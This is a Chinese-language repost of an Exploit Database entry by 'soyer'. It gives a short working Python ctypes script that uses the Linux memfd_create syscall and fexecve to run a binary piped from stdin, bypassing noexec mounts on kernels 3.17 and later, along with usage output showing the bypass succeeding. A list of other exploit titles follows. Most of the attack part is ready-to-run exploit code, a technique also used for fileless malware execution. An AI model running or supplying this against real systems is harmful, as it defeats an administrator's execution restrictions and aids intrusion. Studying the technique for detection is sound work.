Linux Kernel 3.17 – ‘Python ctypes and memfd_create’ noexec File Security Bypass

Exploit Database
12 阅读

作者： soyer

日期： 2015-10-15
类别：
- local
平台：
- linux
来源：https://www.exploit-db.com/exploits/38473/

# Exploit Title: Linux >= 3.17 noexec bypass with python ctypes and memfd_create
# Date: 2015.10.14
# Exploit Author: soyer
# Version: linux >= 3.17
# Tested on: Ubuntu 15.04 (x86_64)
#
# usage:
#
# $ ls -la exec_file
# -rwxr-xr-x 1 soyer soyer 8600 Oct 14 15:04 exec_file
# $ ./exec_file
# bash: ./exec_file: Permission denied
# $ mount |grep $(pwd)
# tmpfs on /run/lock type tmpfs (rw,nosuid,nodev,noexec,relatime,size=5120k)
# $ python noexec.py < exec_file
# Hello world! fprintf=0x400470, stdout=0x7f63a3933740

from ctypes import *
c = CDLL("libc.so.6")
fd = c.syscall(319,"tempmem",0)
c.sendfile(fd,0,0,0x7ffff000)
c.fexecve(fd,byref(c_char_p()),byref(c_char_p()))
print "fexecve failed"

last Exploits
Linux Kernel 3.17 – ‘Python ctypes and memfd_create’ noexec File Security Bypass的更多信息

10-Strike Network Inventory Explorer 8.65 – Buffer Overflow (SEH)：
Sudo 1.8.20 – ‘get_process_ttyname()’ Local Privilege Escalation：
VMware Workstation 15.1.0 – DLL Hijacking：
OpenOffice – OLE Importer DocumentSummaryInformation Stream Handling Overflow (Metasploit)：
shadowsocks-libev 3.1.0 – Command Execution：
AMD Fuel Service – ‘Fuel.service’ Unquote Service Path：
Audiotran 1.4.2.4 – Local Overflow (SEH) (DEP Bypass)：
Audiotran 1.4.1 – Direct RET Buffer Overflow：